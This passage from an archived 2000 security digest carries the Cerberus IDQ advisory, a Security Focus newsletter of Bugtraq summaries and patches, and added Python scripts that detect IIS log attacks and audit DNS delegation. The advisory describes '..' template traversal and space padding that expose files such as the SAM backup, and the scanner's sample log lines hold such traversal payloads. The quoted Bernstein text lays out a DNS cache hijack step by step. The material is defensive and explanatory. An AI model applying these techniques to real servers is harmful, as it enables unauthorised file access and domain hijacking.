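        m = KEY_RE.match(line)
        if m and m.group(1) != "0":
            enabled.append(section)
    return enabled


def harden(text: str) -> Tuple[str, int]:
    """Copy of the file with every AllowMsngrCmds line forced to 0, plus the count changed."""
    out: List[str] = []
    changed = 0
    for line in text.splitlines(keepends=True):
        m = KEY_RE.match(line)
        if m and m.group(1) != "0":
            line = re.sub(r"=\s*\S+", "=0", line, count=1)  # keeps the line ending
            changed += 1
        out.append(line)
    return "".join(out), changed


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path, encoding="utf-8").read() if path else SAMPLE_PROPERTIES
    print("WSMadmin still enabled in:", find_enabled_sections(text) or "none")
    fixed, n = harden(text)
    if path and n:
        open(path + ".hardened", "w", encoding="utf-8").write(fixed)
        print(f"wrote {path}.hardened with {n} line(s) changed")
```

     The script never overwrites the original; it writes a .hardened copy
     to diff and then swap in, because the point of the post is that the
     GUI checkbox does not touch this key, so the file itself is what has
     to be audited after every configuration change.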
     _____________________________________________________________________
     ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
     ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
     SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net

@HWA

33.0 Cerberus Information Security Advisory (CISADV000202)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Cerberus Information Security Advisory (CISADV000202)
     http://www.cerberus-infosec.co.uk/advisories.html

     Released         : 2nd February 2000
     Name             : IDQ
     Affected Systems : Microsoft Windows NT 4 running Internet Information
                        Server 3 or 4
     Issue            : Attackers can access files outside of the web
                        virtual directory system
     Author           : David Litchfield (mnemonix@globalnet.co.uk)

     Description
     ***********

     Any web site running Internet Information Server 3 or 4 and using
     Internet Data Query files to provide search functionality on the site
     may be exposed. IIS also comes with some sample IDQ scripts that are
     vulnerable, so any website with these sample files left on is at risk.
     Using these IDQ scripts or even custom scripts it is possible to break
     outside of the web virtual root and gain unauthorized access to files,
     such as log files and in certain cases the backup version of the
     Security Accounts Manager (sam._). It does require the attacker to
     know the path to the file, for the file to be on the same logical disk
     drive as the IDQ file, and for the ACL to allow read access to the
     anonymous Internet account or the Everyone/guests group.

     Details
     *******

     The extent of this security hole depends upon whether the recent
     "webhits" patch has been installed. See
     http://www.microsoft.com/technet/security/bulletin/ms00-006.asp

     If the patch has been installed there is still a vulnerability -
     however, those that have not installed this patch are most at risk.
     Microsoft are re-releasing this advisory and the updated patch.

     Please note that Windows 2000 does not seem to be vulnerable to this.
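     Both the “::$DATA” trick in the MSNBC story (section 29.0) and the IDQ
     template handling this advisory describes leave a recognisable trace
     in the web server's access log, which is where a server operator can
     look for them. The following Python script is an added example, not
     Cerberus', Microsoft's or HNN's code, that flags such requests: a URI
     stem ending in ::$DATA (encoded or not), an .idq request whose
     template parameter climbs with "..", and a template parameter padded
     with trailing spaces against the 260-character limit the advisory
     quotes. The log lines are constructed in a simplified W3C-style layout
     (method, uri-stem, uri-query, status) rather than copied from a real
     server; the TemplateName parameter comes from the advisory's own
     example and the file paths in the samples are made up.

```python
"""Flag IIS access-log requests that match the two source-disclosure patterns
on this page: the '::$DATA' stream suffix (section 29.0) and Index Server
.idq template traversal or space padding (this advisory).  Added example,
not Cerberus', Microsoft's or HNN's code.  Log lines are constructed in a
simplified W3C-style layout (method, uri-stem, uri-query, status); the
TemplateName parameter comes from the advisory, the paths are made up."""
import re
from typing import List, Tuple
from urllib.parse import unquote

MAX_PATH = 260   # Windows NT shell path limit quoted in the advisory
DATA_STREAM_RE = re.compile(r"::\$DATA$", re.IGNORECASE)

# Constructed sample log, one request per line.
SAMPLE_LOG = [
    "GET /default.asp - 200",
    "GET /default.asp::$DATA - 200",
    "GET /global.asa%3A%3A%24DATA - 200",
    "GET /iissamples/issamples/query.idq CiTemplate=%2Fiissamples%2Fissamples%2Fquery.htx 200",
    "GET /iissamples/issamples/query.idq TemplateName=..%2F..%2Flogfiles%2Fex000201.log 200",
    "GET /iissamples/issamples/query.idq TemplateName=..%2Flogfiles%2Fex000201.log"
    + "%20" * MAX_PATH + " 200",
]


def classify(line: str) -> List[str]:
    """Findings for one log line, in the order detected (empty if benign)."""
    _method, stem, query, _status = line.split(" ", 3)
    findings: List[str] = []
    stem = unquote(stem)

    # 1. Alternate data stream: IIS served the script's source instead of running it.
    if DATA_STREAM_RE.search(stem):
        findings.append("ntfs-data-stream")

    # 2. Index Server query file with a caller-supplied template name.
    if stem.lower().endswith(".idq") and query != "-":
        for pair in query.split("&"):
            _name, _, value = pair.partition("=")
            value = unquote(value)
            segments = value.replace("\\", "/").split("/")
            if ".." in segments and "idq-traversal" not in findings:
                findings.append("idq-traversal")   # idq.dll follows '..' out of the web root
            # Trailing spaces on the template name push an appended .htx past
            # the 260-character limit, so the raw file comes back instead.
            if value != value.rstrip() and "idq-padding" not in findings:
                findings.append("idq-padding")
    return findings


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """(line number, findings) for every line that is flagged."""
    hits: List[Tuple[int, List[str]]] = []
    for lineno, line in enumerate(lines, 1):
        findings = classify(line)
        if findings:
            hits.append((lineno, findings))
    return hits


if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(findings)}")
```

     Decoding the URI before matching matters: the second ::$DATA sample is
     percent-encoded and would slip past a plain substring search on the
     raw log line. Any hit on the padding or traversal rule is worth
     treating as an attempt regardless of the status code, since a
     successful request returns 200 just like a normal search.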
     Cerberus' vulnerability scanner, CIS, has now been updated to check
     for this issue. For those that already have a copy of the scanner you
     can download the updated module from
     http://www.cerberus-infosec.co.uk/webscan.dll - however those that do
     not yet have the scanner, if you would like a copy please go to
     http://www.cerberus-infosec.co.uk/ and follow the Cerberus Internet
     Scanner link on the frontpage.

     If the "webhits" patch HAS NOT been installed
     *********************************************

     Any idq file that resolves remote user input for any part of the
     template file is dangerous. eg:

         CiTemplate = %TemplateName%

     The ISAPI application that deals with IDQ queries is idq.dll and it
     will follow double dots in paths to template files, meaning an
     attacker can break out of the web root.

     If the idq file appends .htx to the CiTemplate eg:

         CiTemplate=/iissamples/issamples/%TemplateName%.htx

     some may think this will limit attackers to viewing only .htx files.
     Not so. Quoting from the Index Server documentation
     (/iishelp/ix/htm/ixidqhlp.htm), "Index Server does not support
     physical paths longer than the Windows NT shell limit (260
     characters)." Due to this limit it is possible to append lots of
     spaces onto the name of the file we want to read, thereby pushing the
     .htx out of the buffer, and we're served back the file.

     IDQ files known to be at risk in one way or another:

         prxdocs/misc/prxrch.idq
         iissamples/issamples/query.idq
         iissamples/exair/Search/search.idq
         iissamples/exair/Search/query.idq
         iissamples/issamples/fastq.idq

     There may be more.

     If the "webhits" patch HAS been installed
     *****************************************

     Machines that have had the patch installed will only be vulnerable if
     the IDQ file does not specify a .htx extension eg:

         CiTemplate = %TemplateName%

     and

         CiTemplate = /somedir/otherdir/%TemplateName%

     are vulnerable whereas

         CiTemplate = /somedir/otherdir/%TemplateName%.htx

     is not vulnerable.

     Solution:
     *********

     Review your IDQ files to determine if you are at risk.
If so edit them and use hardcoded template files. eg CiTemplate=%TemplateName% to CiTemplate=/your-virtual-directory/your-htx-file.htx and then edit your search form to reflect this change. Remove any sample files from the system - not just idq files. Apply the updated patch. About Cerberus Information Security, Ltd ******************************** Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilites leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services. Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405 Permission is hereby granted to copy or redistribute this advisory but only in its entirety. Copyright (C) 2000 by Cerberus Information Security, Ltd ------------------------------------------------------------------------ Delivery co-sponsored by Trend Micro, Inc.: http://www.antivirus.com. ScanMail for Microsoft Exchange * Stops viruses from spreading through Exchange Servers. 
* Eliminates viruses from email in real time, even unknown macro viruses * Filters spam (unsolicited junk email). * Sends customized virus warning messages to specific parties and admins * Remote installation and management via web or ScanMail's Windows GUI ------------------------------------------------------------------------ _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 34.0 Security Focus Newsletter #26 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Security Focus Newsletter #26 Table of Contents: I. INTRODUCTION II. BUGTRAQ SUMMARY 1. Multiple Vendor BSD /proc File Sytem Vulnerability 2. DNS TLD & Out of Zone NS Domain Hijacking 3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability 4. VMware Symlink Vulnerability 5. HP Path MTU Discovery DoS Vulnerability 6. Microsoft East Asian Word Conversion Vulnerability 7. NT RDISK Registry Enumeration File Vulnerability 8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability 9. NT Index Server Directory Traversal Vulnerability III. PATCH UPDATES 1. Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow 2. Vulnerability Patched: NT Index Server Directory Traversal 3. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem 4. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem 5. Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow 6. Vulnerability Patched: NT RDISK Registry Enumeration File 7. Vulnerability Patched: Microsoft East Asian Word Conversion 8. Vulnerability Patched: Multiple Vendor BSD make /tmp Race IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES 1. Outpost Leaves Data Unguarded (Mon Jan 24 2000) 2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000) 3. Task Force Battles Online Criminals (Wed Jan 26 2000) 4. Smart card 'inventor' lands in jail (Thu Jan 27 2000) 5. 
Visa acknowledges cracker break-ins (Fri Jan 28 2000) 6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000) V. INCIDENTS SUMMARY 1. Got scanned again (Thread) 2. Unusual scan pattern (Thread) 3. Possible Probe = Possible Malfunction (Thread) 4. No Idea (Thread) 5. PC Anywhere client seems to probe class C of connected networks (Thread) 6. unapproved AXFR (Thread) 7. Connect thru PIX & ports 1727, 2209, 9200 (Thread) 8. Anti-Death Penalty (Thread) 9. Strange DNS/TCP activity (Thread) 10. eri? (Thread) 11. source port 321 (Thread) 12. Korea (again) (Thread) 13. BOGUS.IvCD File (Thread) 14. port 768 (Thread) 15. Extrange named messages (Thread) 16. Probes to tcp 2766 ('System V Listner') (Thread) 17. Possible attempt at hacking? (Thread) 18. DNS update queries: another sort of suspicious activity. (Thread) VI. VULN-DEV RESEARCH LIST SUMMARY 1. Shadow (Thread) 2. things to break.. (Thread) 3. HTTP scanners? (summary, long) (Thread) 4. CGI insecurities (Thread) 5. ICQ Pass Cracker. (Thread) 6. File Share Vacuum (Thread) 7. IIS4.0 .htw vulnerability (Thread) 8. Napster a little insecure? (Thread) 9. distributed.net and seti@home (Thread) VII. SECURITY JOBS Seeking Employment: 1. Prashant Vijay (Summer Internship) Seeking Staff: 1. Security Research Engineer (Atlanta, Ga) 2. Practice Manager w/PKI experience NYC, Philly or DC) 3. Lead Security Engineer - Bay Area/San Jose 4. Senior security engineers - Bay Area/San Jose 5. Virus coder wanted (San Antonio, TX) 6. Junior Security Engineers Needed (Maryland) VIII. SECURITY SURVEY RESULTS IX. SECURITY FOCUS TOP 6 TOOLS 1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT) 2. SecurityFocus.com Pager (Win95/98/NT) 3. lidentd 1.0p1 (Linux) 4. Cgi Sonar 1.0 (any system supporting perl) 5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris and SunOS) 6. Secret Sharer 1.0 1.0 (Windows 95/98) X. SPONSOR INFORMATION - CORE SDI http://www.core-sdi.com XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION I. 
I. INTRODUCTION
-----------------

Welcome to the SecurityFocus.com 'week in review' newsletter issue 26 for the time period of 2000-01-24 to 2000-01-30, sponsored by CORE SDI.

CORE SDI is an international computer security research and development company. Its clients include 3 of the Big 5 chartered accountant firms, for whom CORE SDI develops customized security auditing tools, as well as several notable computer security product vendors, such as Network Associates. In addition to providing 'consultant to the consultant' services, CORE also performs risk assessment and security infrastructure consulting for a large number of government and Fortune 500 companies in both North and Latin America.

http://www.core-sdi.com

II. BUGTRAQ SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------

1. Multiple Vendor BSD /proc File System Vulnerability
BugTraq ID: 940
Remote: No
Date Published: 2000-01-21
Relevant URL: http://www.securityfocus.com/bid/940
Summary:

Certain BSD derivative operating systems use an implementation of the /proc filesystem which is vulnerable to attack from malicious local users. This attack will gain the user root access to the host.

The proc file system was originally designed to allow easy access to information about processes (hence the name). Its typical benefit is quicker access to memory, hence more streamlined operations. As noted previously, certain implementations have a serious vulnerability. In short, the vulnerability is that users may manipulate processes, on systems which use /proc, to gain root privileges. The full details are covered at length in the advisory attached to the 'Credit' section of this vulnerability entry.

2. DNS TLD & Out of Zone NS Domain Hijacking
BugTraq ID: 941
Remote: Yes
Date Published: 2000-01-23
Relevant URL: http://www.securityfocus.com/bid/941
Summary:

A vulnerability exists in the mechanism used by DNS, in general, to determine the name server associated with TLDs (top level domains).
DNS is built upon levels of trust, and by exploiting single points of failure in this trust system, it becomes possible for an attacker to convince a caching nameserver that allows recursion through it that the root server for a given TLD is something other than what it actually is. By consecutively performing these cache attacks, it could be possible for an attacker to entirely take over name service for any given domain.

The vulnerability is actually not specific to TLDs. The same attack can be used to hijack any domain which has out of zone NS records, if any of the servers that act as the name server for the out of zone domain can be compromised.

The simplest explanation was presented in the example provided by its discoverer, Dan Bernstein, on the Bugtraq mailing list, on January 23, 2000:

"Suppose an attacker can make recursive queries through your cache. Let me emphasize that this does not mean that the attacker is one of your beloved users; many programs act as DNS query-tunneling tools.

Suppose the attacker is also able, somehow, to take over ns2.netsol.com. This isn't one of the .com servers, but it's a name server for the gtld-servers.net domain.

Here's what happens:

(1) The attacker asks your cache about z.com. Your cache contacts (say) k.root-servers.net, which provides a referral:

      com NS j.gtld-servers.net (among others)
      j.gtld-servers.net A 198.41.0.21

    These records are cached.

(2) The attacker asks your cache about z.gtld-servers.net. Your cache contacts (say) f.root-servers.net, which provides a referral:

      gtld-servers.net NS ns2.netsol.com (among others)
      ns2.netsol.com A 207.159.77.19

    These records are cached.

(3) The attacker takes over ns2.netsol.com.

(4) The attacker asks your cache about zz.gtld-servers.net. Your cache contacts ns2.netsol.com, and the attacker answers:

      zz.gtld-servers.net CNAME j.gtld-servers.net
      j.gtld-servers.net A 1.2.3.4

    These records are cached, wiping out the obsolete j glue.

(5) A legitimate user asks your cache about yahoo.com. Your cache contacts j.gtld-servers.net, and the attacker answers:

      yahoo.com A 1.2.3.4

    The user contacts yahoo.com at that address."

The attack offered requires that an attacker be able to compromise the operation of the DNS server running on, in this case, ns2.netsol.com, although this is not the only server that could potentially be used to launch an attack of this style. The author further indicates that there are in excess of 200 servers that could be used to manipulate resolution of all the .COM domains.

3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability
BugTraq ID: 942
Remote: Yes
Date Published: 2000-01-21
Relevant URL: http://www.securityfocus.com/bid/942
Summary:

Vpopmail (vchkpw) is a free GPL software package built to help manage virtual domains and non-/etc/passwd email accounts on Qmail mail servers. This package is developed by Inter7 (referenced in the 'Credit' section) and is not shipped, maintained or supported by the main Qmail distribution. Certain versions of this software are vulnerable to a remote buffer overflow attack in the password authentication of vpopmail.

4. VMware Symlink Vulnerability
BugTraq ID: 943
Remote: No
Date Published: 2000-01-21
Relevant URL: http://www.securityfocus.com/bid/943
Summary:

VMware is software that runs multiple virtual computers on a single PC, at the same time, without partitioning or rebooting. Certain versions of the VMware for Linux product do not perform /tmp file sanity checking and create files in the /tmp directory which will follow symlinks. This may be used by a malicious user to overwrite any file (with log data) which falls within the write permissions of the user ID which VMware executes as. Typically this is root. This attack will most likely result in a denial of service and not a root level compromise.

5.
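The transitive trust chain that item 2 above describes can be audited from delegation data alone. The following is an added example (not from the newsletter and not Bernstein's code) that, given a constructed toy table of NS records mirroring the quoted referrals, flags out-of-zone NS hosts and lists every zone whose compromise could redirect a name such as yahoo.com:

```python
"""Transitive DNS trust audit for the out-of-zone NS problem (BugTraq ID 941).

A zone whose NS hosts live in a *different* zone can be hijacked by anyone who
controls that other zone, and so on recursively.  A defender can enumerate
exactly which zones a given name depends on and flag out-of-zone delegations.
"""

# Constructed toy delegation table: zone -> NS host names.  The com,
# gtld-servers.net and root-server entries mirror the referrals quoted in the
# newsletter; the remaining entries are invented so that the walk terminates.
NS_RECORDS = {
    ".": ["k.root-servers.net", "f.root-servers.net"],
    "root-servers.net": ["k.root-servers.net"],   # constructed, in-zone
    "net": ["j.gtld-servers.net"],                # constructed
    "com": ["j.gtld-servers.net"],                # from the quoted referral
    "gtld-servers.net": ["ns2.netsol.com"],       # from the quoted referral
    "netsol.com": ["ns2.netsol.com"],             # constructed, in-zone
    "yahoo.com": ["ns1.yahoo.com"],               # constructed, in-zone
}


def enclosing_zone(host):
    """Deepest configured zone containing host, i.e. the zone serving its A record."""
    best = "."
    for zone in NS_RECORDS:
        if zone == ".":
            continue
        if host == zone or host.endswith("." + zone):
            if best == "." or len(zone) > len(best):
                best = zone
    return best


def ancestor_zones(name):
    """Every configured zone on the path from the root down to name."""
    labels = name.rstrip(".").split(".")
    zones = ["."]
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in NS_RECORDS:
            zones.append(candidate)
    return zones


def out_of_zone_ns(zone):
    """NS hosts of zone whose addresses are served by some other zone."""
    return [ns for ns in NS_RECORDS[zone] if enclosing_zone(ns) != zone]


def trust_dependencies(domain):
    """All zones whose servers, if compromised, could redirect domain.

    Walks the delegation chain; each out-of-zone NS pulls in the zone that
    serves that NS host plus all of that zone's parents, transitively.
    """
    deps = set()
    work = ancestor_zones(domain)
    while work:
        zone = work.pop()
        if zone in deps:
            continue
        deps.add(zone)
        for ns in NS_RECORDS.get(zone, []):
            if enclosing_zone(ns) != zone:
                work.extend(ancestor_zones(ns))
    return deps


if __name__ == "__main__":
    for zone in NS_RECORDS:
        foreign = out_of_zone_ns(zone)
        if foreign:
            print(f"{zone!r} delegates to out-of-zone servers: {foreign}")
    # yahoo.com depends on the gtld-servers.net and netsol.com zones as well
    # as on its own parents, exactly the chain the quoted attack exploits.
    print("zones that can redirect yahoo.com:",
          sorted(trust_dependencies("yahoo.com")))
```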
HP Path MTU Discovery DoS Vulnerability
BugTraq ID: 944
Remote: Yes
Date Published: 2000-01-24
Relevant URL: http://www.securityfocus.com/bid/944
Summary:

A potential denial of service exists in Hewlett-Packard's proprietary protocol for discovering the maximum path MTU (PMTU) for a given connection. This feature could potentially be used to cause denial of service, using HP-UX machines as "amplifiers." Essentially, HP machines which are vulnerable can, under certain conditions, be coerced into sending far more data outbound than they receive inbound. By forging source addresses, it is possible to send a small quantity of packets purporting to be from a given source, and cause the HP-UX machine to send multiple packets in response. This could potentially be used as a denial of service.

HP's proprietary path discovery protocol works by sending data in parallel with the ICMP packets being used for path discovery. While exact details of the nature of the denial of service were not made public, presumably it could be possible to utilize UDP packets, and default UDP services, to start the chain of events leading to a denial of service.

6. Microsoft East Asian Word Conversion Vulnerability
BugTraq ID: 946
Remote: No
Date Published: 2000-01-20
Relevant URL: http://www.securityfocus.com/bid/946
Summary:

East Asian language versions of Word and PowerPoint are susceptible to a buffer overflow exploit. The overflowable buffer is in the code that converts Word 5 documents into newer formats. Word 97, 98, and 2000 will automatically convert older files into the new format upon loading. If a specially-modified Chinese, Japanese or Korean Word 5 document is loaded into a newer version of Word or PowerPoint, arbitrary code can be executed during the conversion process, at the privilege level of the current user.

7.
NT RDISK Registry Enumeration File Vulnerability
BugTraq ID: 947
Remote: No
Date Published: 2000-01-21
Relevant URL: http://www.securityfocus.com/bid/947
Summary:

The Rdisk utility shipped with all versions of Windows NT 4.0 is used to make an Emergency Repair Disk. During the creation of this disk, a temporary file ($$hive$$.tmp) is created in the %systemroot%\repair directory that contains the registry hives while they are being backed up. The group Everyone has Read permission to this file, and in this manner sensitive information about the server could be leaked. The file is put in a location that is not shared by default, and is removed immediately after the disk is created. The only likely scenario where this could be exploited is in the case of NT Terminal Server, where an administrator and a regular user could both be logged in interactively at the same time.

8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability
BugTraq ID: 948
Remote: Yes
Date Published: 2000-01-26
Relevant URL: http://www.securityfocus.com/bid/948
Summary:

There is a remotely exploitable buffer overflow in Qualcomm's 'qpopper' daemon which allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon. The problem lies in the code that handles the 'LIST' command available to logged in users. By providing an overly long user supplied argument, a buffer may be overflowed, resulting in the attacker gaining access with the user ID (UID) of the user whose account is being used for the attack and the group ID (GID) mail. This will result in remote access to the server itself and possibly (depending on how the machine is configured) access to read system users' mail via the GID mail.

9. NT Index Server Directory Traversal Vulnerability
BugTraq ID: 950
Remote: Yes
Date Published: 2000-01-26
Relevant URL: http://www.securityfocus.com/bid/950
Summary:

Index Server 2.0 is a utility included in the NT 4.0 Option Pack.
The functionality provided by Index Server has been built into Windows 2000 as Indexing Services. When combined with IIS, Index Server and Indexing Services include the ability to view web search results in their original context. It will generate an html page showing the query terms in a short excerpt of the surrounding text for each page returned, along with a link to that page. This is known as "Hit Highlighting". To do this, it supports the .htw filetype which is handled by the webhits.dll ISAPI application. This dll will allow the use of the '../' directory traversal string in the selection of a template file. This will allow for remote, unauthenticated viewing of any file on the system whose location is known by the attacker.

III. PATCH UPDATES 2000-01-24 to 2000-01-30
-------------------------------------------

1. Vendor: Qualcomm
Product: Qpopper
Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow
Bugtraq ID: 948
Relevant URLs:
http://www.eudora.com/freeware/qpop.html#BUFFER
http://www.securityfocus.com/bid/948
Patch Location:
ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper3.0b31.tar.Z

2. Vendor: Microsoft
Product: Index Server for Windows NT and 2000
Vulnerability Patched: NT Index Server Directory Traversal
Bugtraq ID: 950
Relevant URLs:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/950
Patch Locations:
Index Server 2.0:
  Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
  Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000:
  Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726

3. Vendor: OpenBSD
Product: OpenBSD
Vulnerability Patched: Multiple Vendor BSD /proc File System
Bugtraq ID: 940
Relevant URLs:
http://www.openbsd.org/errata.html
http://www.securityfocus.com/bid/940
Patch Location:
http://www.openbsd.org/errata.html#procfs

4.
Vendor: FreeBSD
Product: FreeBSD
Vulnerability Patched: Multiple Vendor BSD /proc File System
Bugtraq ID: 940
Relevant URLs:
http://www.freebsd.org/security/
http://www.securityfocus.com/bid/940
Patch Location:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:02/procfs.patch

5. Vendor: Inter7
Product: vpopmail
Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow
Bugtraq ID: 942
Relevant URLs:
http://www.inter7.com/
http://www.securityfocus.com/bid/942
Patch Location:
http://www.inter7.com/vpopmail/ (version 3.1.11e)

6. Vendor: Microsoft
Product: NT 4.0 Terminal Server Edition
Vulnerability Patched: NT RDISK Registry Enumeration File
Bugtraq ID: 947
Relevant URLs:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/947
Patch Location:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17384

7. Vendor: Microsoft
Product: Office (All versions, including Word and PowerPoint)
Vulnerability Patched: Microsoft East Asian Word Conversion
Bugtraq ID: 946
Relevant URLs:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/946
Patch Locations:
- Word 97 or 98, PowerPoint 98:
  US:        http://officeupdate.microsoft.com/downloaddetails/ww5pkg.htm
  Japan:     http://officeupdate.microsoft.com/japan/downloaddetails/MalformedData-97.htm
  Korea:     http://officeupdate.microsoft.com/korea/downloaddetails/MalformedData-97.htm
  China:     http://officeupdate.microsoft.com/china/downloaddetails/MalformedData-97.htm
  Taiwan:    http://officeupdate.microsoft.com/taiwan/downloaddetails/MalformedData-97.htm
  Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/MalformedData-97.htm
- Converter Pack 2000; Office 2000 with Multilanguage Pack; Word 2000, PowerPoint 2000:
  US:        http://officeupdate.microsoft.com/2000/downloaddetails/ww5pkg.htm
  Japan:     http://officeupdate.microsoft.com/japan/downloaddetails/2000/MalformedData-2K.htm
  Korea:     http://officeupdate.microsoft.com/korea/downloaddetails/2000/MalformedData-2K.htm
  China:     http://officeupdate.microsoft.com/china/downloaddetails/2000/MalformedData-2K.htm
  Taiwan:    http://officeupdate.microsoft.com/taiwan/downloaddetails/2000/MalformedData-2K.htm
  Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/2000/MalformedData-2K.htm

8. Vendor: FreeBSD
Product: FreeBSD
Vulnerability Patched: Multiple Vendor BSD make /tmp Race Condition
Bugtraq ID: 939
Relevant URLs:
http://www.freebsd.org/security
http://www.securityfocus.com/bid/939
Patch Location:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:01/make.patch

IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES
-----------------------------------------

1. Outpost Leaves Data Unguarded (Mon Jan 24 2000)
Excerpt:
While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too.
Relevant URL: http://www.wired.com/news/technology/0,1282,33842,00.html

2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000)
Excerpt:
Japan said on Tuesday it will seek help from the United States in an investigation into hackers who penetrated two government Web sites.
Relevant URL: http://news.excite.com/news/r/000125/00/net-japan-hackers

3. Task Force Battles Online Criminals (Wed Jan 26 2000)
Excerpt:
Ground zero in California's war against Internet crime is behind a dumpster hard by a hamburger stand in a faded Sacramento County welfare building. This is the headquarters of the Sacramento Valley high-tech task force, a multi-agency law enforcement team dedicated to tracking down e-crime, from stock swindlers to child pornographers.
Relevant URL: http://www.latimes.com/news/asection/20000126/t000008196.html

4.
Smart card 'inventor' lands in jail (Thu Jan 27 2000)
Excerpt:
In another case destined to fuel e-commerce anxieties, a Parisian computer programmer is facing counterfeiting and fraud charges after developing a homemade "smart card" that he says gave him the ability to fraudulently purchase goods and services throughout France.
Relevant URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2428429,00.html?chkpt=zdnnstop

5. Visa acknowledges cracker break-ins (Fri Jan 28 2000)
Excerpt:
Visa International Inc. acknowledged this week that computer crackers broke into several servers in its global network last July and stole information. The company said that in December, it received a phone call and an e-mail demanding money in exchange for the data.
Relevant URL: http://www.computerworld.com/home/print.nsf/all/000128e45a

6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000)
Excerpt:
In its review of the last 12 months, Sophos, the IT security firm, says that 1999 turned out to be a year when mass-mailed viruses arrived and dominated the scene. The annual review says that virus writers are now taking advantage of the Internet and corporate e-mail systems to distribute their creations more quickly.
Relevant URL: http://www.currents.net/newstoday/00/01/28/news8.html

V. INCIDENTS SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------

1. Got scanned again (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=388C09A6.8EB8CC47@scalajwt.ro

2. Unusual scan pattern (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001241252.G29957@bluebottle.itss

3. Possible Probe = Possible Malfunction (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.3.32.20000125180337.008613b0@mail.9netave.com

4.
No Idea (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3926668584.948819473@pc27233.utdallas.edu

5. PC Anywhere client seems to probe class C of connected networks (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.21.0001251657260.10263-100000@barrel.dt.ecosoft.com

6. unapproved AXFR (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001251742.C24564@bluebottle.itss

7. Connect thru PIX & ports 1727, 2209, 9200 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=D6C7B533F7C4D311BBD800001D121E7F0151D2@clmail.cmccontrols.com

8. Anti-Death Penalty (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001271722320.19098-100000@wr5z.localdomain

9. Strange DNS/TCP activity (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000127205611.23795.qmail@securityfocus.com

10. eri? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=200001281146.FAA20359@hank.cs.utexas.edu
